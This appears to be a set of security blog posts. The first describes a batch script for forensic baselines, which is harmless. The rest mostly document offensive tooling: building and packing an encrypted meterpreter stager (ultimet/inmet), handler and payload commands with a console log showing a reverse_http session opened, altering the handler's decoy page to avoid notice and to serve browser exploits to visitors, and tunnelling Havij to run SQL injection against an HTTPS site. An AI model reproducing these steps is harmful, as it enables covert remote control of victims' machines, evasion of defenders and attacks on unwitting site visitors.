COPP – simple batch script for live forensics and baseline creation


To detect something “abnormal” in your computer network, you need to first know how the “normal” looks like … sounds simple, right? do you have a list of the processes that “normally” runs on your computer? network connections? how about system drivers? no? where’s “explorer.exe” in your computer? c:\windows or c:\windows\system32? don’t know? didn’t think so :) so when a “previously-unknown-malware”  spews on your windows machine you won’t know … to do that you need a baseline that you can refer to when you compare between what you found and what is … well, “normal”.

Creating baselines of a computer usually comprises collecting information about the following from a “known-clean-state”:

  • Running processes.
  • Network communications “established and listening”.
  • Registry “windows” and startup entries.
  • Files.
  • Services.
  • Loaded modules “DLLs”.
  • Drivers.
  • installed applications.
  • … and few other “users, context …etc.”

Once you have a list of the above stored somewhere in an easy to parse format, you can come later and collect same information then compare the new findings and detect “anomalies”.

Even though for different purposes, the interesting thing is that almost the same list of information is gathered during digital investigations of systems that are running and might have been compromised, some call that process “digital forensic evidence gathering from live systems”.

Microsoft was kind enough to create a tool called `COFEE` that makes gathering this information easier:

wikipedia: Computer Online Forensic Evidence Extractor (COFEE) is a tool kit, developed by Microsoft, to help computer forensic investigators extract evidence from a Windows computer. Installed on a USB flash drive or other external disk drive, it acts as an automated forensic tool during a live analysis. Microsoft provides COFEE devices and online technical support free to law enforcement agencies.

Law enforcement agencies?! What about mere mortals?

COPP – COFEE Of Poor People

I have been gathering information from computers in an environment as a step to create the above mentioned “baseline”, I often gather information on investigations that involves live systems, so I created a simple DOS batch script to gather the AM information, it’s poor-man’s-effort COFEE.


  •  once executed, it creates a directory “folder” with computer name, time and date, then iterates through a list of commands then pipe the output to a file.


  • Run as administrator!
  • It can be easily configured to write the output to a windows share instead of local directory, then executed on all machines in a domain environment using a group policy or PsExec “you will also need to adjust how the output is written to the file”.

Get the zip file from here: 


If you reached here, this means you really are interested about the topic, please note that a much better way to do that with more comprehensive data is through Mandiant’s Redline, it’s free and straight forward, and that is what I *really* use ;)


[ultimet v0.25.1] – msfpayload functions & social engineering friendly


25 – 01 Revolution Edition


What’s new in this version?

  • msfpayload functionality: It can create exe files that connects upon execution using pre-configured settings “exactly as msfpayload generated exe”, however, generated exe files still accept command line arguments and settings could be reset or changed, all that supported from within that single exe … “meterpreter-on-steroids”. (thanks mihi for the hint…)
  • The generated exe is a pre-configured ultimet that can be used to create OTHER exe files! so, let’s say you created a reverse_tcp exe using the --msfpayload option, you can use THAT exe later to create another bind_metsvc, then use THAT exe to create a reverse_http … and so on, or simply reset to default…pretty neat!
  • Linux support: the msfpayload-like functionality works under linux perfectly fine using “wine >= 1.3.17″, no need to leave your beloved *n?x box to create a pre-configured exe.
  • Run-time parsing and Patching of the ReflectiveDLL: Offset of ReflectiveLoader function is calculated at runtime and bootstrap is patched in memory, so, in plain english, you can use your own self-compiled metsrv.dll as the stage! “By Anwar Mohamed – @anwarelmakrahy”.
  • –remove-stage option: No need to use a resource editor to remove the stage from the exe, using the new option will create a new file with stage removed.


Read more here, download the zip file from here, fork the project at GitHub from here or learn how to compile from source fro here ”a bit outdated, but you’ll get the point”

What’s with that strange version number?

The previous version was 0.2, Calling this version 0.25.1 is our way of celebrating the anniversary of the Egyptian Revolution that started (25-01-2011) :)

kindly wish us luck, since we’re still struggling to get out of the !@#$ pit holes the previous regime kept us living in for the previous 30 years.



[ultimet_v0.2] – Added support for bind_tcp & bind_metsvc


What’s new:

- Anwar Mohamed “@anwarelmakrahy” Added support for metsvc_bind_tcp & bind_tcp… `git pull` if you’re interested in the source code, or just get the binaries from here.

… Thanks, Anwar!

- Now ultimet works as the following meterpreter payloads:

  • reverse_tcp
  • bind_tcp
  • reverse_http
  • reverse_https
  • bint_metsvc <- when stage included
  • reverse_metsvc <- when stage included

- Code got just messier … promise will consolidate  functions and make it tidy-er and smaller someday.

- I promise next version will have exciting “options” … coming soon, God willing … stay tuned :)


For intro. and information about what’s this all about, please go here

Compiling from source, usage examples & FAQ

To download ultimet, click here

Source code – github:



ultimet – Compiling from source, usage examples & FAQ



For intro. and information about what’s this all about, please go here

To download ultimet, click here

Source code – github:

Q: What are the available options?



Q: I don’t like running binaries from people I do not trust, how to compile from source?

1- Clone the source from

2- Open solution in VS “if it complained about missing encrypted.rsc just ingore that, it’ll come later” … chose “release” -> right click “ultimet_xor” -> build.

01 3- In the “Release” directory, ultimet_xor.exe will be there … copy ”metsrv.dll” from your metasploit installation, “/opt/metasploit/msf3/data/meterpreter/metsrv.dll” to “release”

4- Now, drag-and-drop metsrv.dll over ultimet_xor.exe, or cmd.exe -> “ultimet_xor.exe metsrv.dll” if you want to see some cool progress status messages :)


5- Now you have “encrypted.rsc” … that’s metsrv.dll encrypted in a way that ultimet will be able to decrypt.


6- Open “inmet/inmet.rc” using a text editor, and hard code the path of encrypted.rsc, I placed mine under “e:\\”, I did that because VS stupid linker just gave me hell because of relative paths.


7- Now build the “ultimet” project…


… even though it is named “ultimet” … that’s actually what I’ve been calling in my blog post “inmet” … the inline meterpreter.

Q: Ok, if that’s “inmet”, how can I get “ultimet.exe” … the one without the stage, the skinny small executable?

1- open the exe using your resource editor of choice “I use XN Resource Editor


2- Locate the resource called “BINARY” ID “101″ … delete it, save as: “the_real_ultimet.exe” … or whatever, now you have both versions


3- To make them even smaller, get UPX, and –ultra-brute them both … don’t worry, they’ll still just run fine after that… if they didn’t, please upx -d them and try again.

08 09

ultimet now is well below the 64kb threshold ;)

Q: Ok, but what if I have the skinny exe “ultimet” and want to bundle it with the stage?

- Ok, you annoying little one, you have two options:

1- include the metsrv.dll directly in the exe, just like the following:


- pick metsrv.dll


- Name it “BINARY” and ID “101″


Save and run … as you can notice, ultimet is smart enough to know that the bundled stage is not encrypted and handles it correctly


2- Encrypt metsrv.dll using “ultimet_xor.exe” as explained before, then include encrypted.rsc:

- I am sure you can do that on your own … , however, notice that ultimet will correctly recognize that the resource is encrypted, extract the encryption key, decrypt it, and proceed like a champ …


Q: Some examples, please…


exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_http LPORT=8080
inmet.exe -h -p 8080 -t reverse_http


exploit/multi/handler PAYLOAD=windows/metsvc_reverse_tcp LPORT=8090
inmet.exe -h -p 8090 -t reverse_metsvc



Will not work with reverse_metsvc.

exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8888
inmet.exe -h -p 8888 -t reverse_tcp




Creating a better meterpreter reverse_http handler…

EDIT: As of framework commit 912bfd5, the features described in this post are now part of the framework itself…

learning just a little more about how MSF works…

IMHO, meterpreter/reverse_http is one of the best payloads available in the metasploit arsenal, this post is about modifying the handler part, so it will look less suspicious, and will provide more options for popping even more boxes “if we want”.

As indicated by its name, the communication between the payload and the framework  takes place over the HTTP protocol, where the handler functions as some kind of a special “web server”, a smart, special web server … that manages multiple sessions and is capable of differentiating between legal requests “coming from exploited machines” and illegal requests “coming from search engine bots or a smarty-pants sysadmin who noticed something” … let’s see a quick example:

Setting up a handler:

msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > set LHOST
msf  exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started HTTP reverse handler on
[*] Starting the payload handler...

Creating the exe:

root@bt:~# msfpayload windows/meterpreter/reverse_http LPORT=8080 LHOST= X > reverse_http.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_http
 Length: 350
Options: {"LPORT"=>"8080", "LHOST"=>""}

Run on target:

msf exploit(handler) >
[*] Request received for /isH8...
[*] Staging connection for target /isH8 received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641772...
[*] Patched Communication Timeout at offset 641776...
[*] Meterpreter session 4 opened ( -> at 2012-12-19 15:06:06 -0500

 How the traffic looks like:


Everything is going smooth, the handler, well, “handled” the payload connection … let’s see what happens when a casual “web-surfer” hits that special web server:


That’s nice of metasploit, but how it actually makes that happen “handle payload connections correctly, and throw the un-welcoming message at bad requests” is going to be another story for another day, today, we focus on how to change that ugly-looking and not-very-useful message… and adding some nastiness along the way…

Changing the HTML response body ”the bad way to do it”

That message is specified in the file “core/handler/reverse_http.rb”, look for it under the framework installation directory, the value to be changed is “resp.body” just before the end of the file.


Change that, save the file, reload the framework and next time the casual visitors will be greeted with whatever you specify there (please read through to find THE better way to do that) ….

Warning! Evil thoughts ahead …

Yes, my evil friend, you can create a (browser autopwn, SET, Blackhole exploit kit … etc.) listening on a different port, and make that “resp.body” include an iframe that loads the browser exploit, so, if someone is connecting to your handler, he’d better be pwned, or he is just one step closer to get pwned :) … I’ll leave the details on how to do that to your imagination, but trust me, it’s a lot of fun …

Changing the HTML response body ”the good way to do it”

It doesn’t make sense to manually crack the file open and change the value, right? let’s create a new advanced parameter to that handler, and make it as a variable :) … please follow along:

  • Open the above mentioned file “core/handler/reverse_http.rb”, look for the section that starts with “register_advanced_options


  • Create a new line like the following “put it BEFORE THE LAST LINE that reads” or at least take care of the `,` at the end of each line or it will come back an bite you … only the last one doesn’t have a `,` :'HttpUknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ]),
  • Now we have a new “advanced variable” called “HttpUknownRequestResponse” … let’s use it.
  • Change “resp.body”:
resp.body    = "#{datastore['HttpUknownRequestResponse']}"

That’s it :) let’s see the fruits of our “hard” work … run msfconsole, and type “show advanced”


That’s no fun … let’s try something else:

set HttpUnknownRequestResponse '<html><center><h1> Sup! </h1><img src=""></center></html>'



… you got the idea … and even though this might be a small modification to be included in the framework, I submitted a pull request anyway.

EDIT: well, the pull request got approved and now it’s a part of the framework “/me: happy”



Using “stunnel” to run “Havij” against “HTTPS” sites.


I am all into sqlmap, however, there are situations where sqlmap just fails for one reason or another, and Havij gets the job done.

One major problem with Havij is that it doesn’t work with HTTPS sites “at least for me”, and I came across a particular site with a confirmed SQLi that when I pointed sqlmap at it didn’t work, so, I ran Havij:

Pressed the Analyze button, aaaaaand…. nothing, it’s IDLE

So, I thought maybe Havij doesn’t do HTTPS, my solution approach was using  stunnel to listen on port:80 and configure it to connect to the https site, the point Havij to the stunnel server at port:80 and let stunnel to the SSL

Let’ see how the stunnel.conf will look like:

then run “stunnel stunnel.conf” …

Ok, looks good to me… Now I’ll point Havij to the stunnel machine with HTTP

And Havij just works fine after that :)